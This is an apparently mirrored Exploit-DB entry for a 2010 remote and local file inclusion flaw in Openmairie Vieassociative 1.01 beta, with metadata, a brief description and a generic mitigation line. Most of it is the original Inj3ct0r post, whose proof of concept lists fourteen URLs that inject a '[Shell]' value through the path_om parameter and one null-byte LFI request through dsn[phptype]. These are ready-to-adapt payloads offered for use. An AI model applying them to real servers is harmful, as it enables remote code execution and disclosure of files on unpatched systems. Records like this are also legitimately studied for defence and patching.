Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability

vendor:

Vieassociative Openmairie

by:

cr4wl3r

7.5

CVSS

HIGH

RFI/LFI

CWE

Product Name: Vieassociative Openmairie

Affected Version From: 1.01 beta

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability

The Vieassociative Openmairie 1.01 beta version is vulnerable to multiple file include vulnerability through remote or local file inclusion. An attacker can exploit this vulnerability to include arbitrary files and execute remote code or read sensitive information.

Mitigation:

Apply the latest patch or upgrade to a non-vulnerable version of the software.

Source

Exploit-DB raw data:

=================================================================================
Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability
=================================================================================

[+] Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4864/openmairie_vieassociative_1.01beta.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/gen/obj/association.class.php??path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/planning.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/rubrique.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/assurance.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/cotisation.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/profil.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/bureau.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/aquartier.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/categorie.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/fonction.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/ressource.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-13]